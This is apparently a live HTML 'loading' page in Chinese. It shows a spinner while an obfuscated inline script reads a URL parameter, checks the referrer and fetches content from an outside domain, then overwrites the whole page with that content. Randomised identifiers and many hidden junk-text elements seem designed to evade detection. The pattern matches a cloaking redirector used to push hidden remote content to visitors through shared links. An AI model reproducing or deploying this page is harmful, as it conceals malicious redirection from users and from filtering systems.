<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .exfJuvGZDCZ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .exfJuvGZDCZ .pSwGL5hi6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .exfJuvGZDCZ .content {
            line-height: 50px;
            text-align: center
        }

        .exfJuvGZDCZ .img {
            width: 100%
        }

        .exfJuvGZDCZ .ztmAsI95 {
            text-align: center
        }

        .exfJuvGZDCZ .ztmAsI95 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .exfJuvGZDCZ .ztmAsI95 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .exfJuvGZDCZ .ztmAsI95 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .exfJuvGZDCZ .ztmAsI95 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .exfJuvGZDCZ .ztmAsI95 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .exfJuvGZDCZ .ztmAsI95 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .exfJuvGZDCZ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZP0rJwhQUYVY(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FPYxHvP = ZP0rJwhQUYVY('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FPYxHvP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FPYxHvP +".html?a=share";
		}
		
        OgK6B7F7zt=url+"#"+new Date().getTime();
        OgK6B7F7zt && function() {
            $.get(OgK6B7F7zt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>vRNrIBn0N41L5F2f6lymdQCJyUk</div>
<b style='display:none' >dtKCFWpWW6PLNTPTjkaoxxmX1QSSmsfgtNZIEbXmY6BtWlBtLh</b>
<b style='display:none' >dtKCFWpWW6PLNTPTjkaoxxmX1QSSmsfgtNZIEbXmY6BtWlBtLh</b>
<div style='display:none'>vRNrIBn0N41L5F2f6lymdQCJyUk</div>
<b style='display:none' >dtKCFWpWW6PLNTPTjkaoxxmX1QSSmsfgtNZIEbXmY6BtWlBtLh</b>
<h1 style='display:none' >SCKimTADoMuk7GR7TT6oGVBEr12uvbHB6V56HgYW00ihcCbtHqQSsxuTbEH</h1>
<ul style='display:none' >b0nz95BFXf62k2LOnJAtjdDP1cOyntHCakbW3mceRf1nQwMh8nv5igiB87RZ3OO7VI</ul>
<b style='display:none' >dtKCFWpWW6PLNTPTjkaoxxmX1QSSmsfgtNZIEbXmY6BtWlBtLh</b>
<div style='display:none'>vRNrIBn0N41L5F2f6lymdQCJyUk</div>
<a  href='#' style='display:none'>DLSk9PamSrYzpoUW7SoM3Oo0SBeqxw1jR8LKaZyZ8KwBRvxzmQ7bxfyhrEVStvSlqB0WkWUpugxurD7Lf7ndKO84zUtvnlndmcp</a><div class="exfJuvGZDCZ">
    <div class="pSwGL5hi6">
        <div class="ztmAsI95">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<p  style='display:none'>zsUObH5kUA42gey2B0Byys0LSyjF23QF</p>
<h1 style='display:none' >HbQ4VCkuwNzAwe</h1></body>
</html>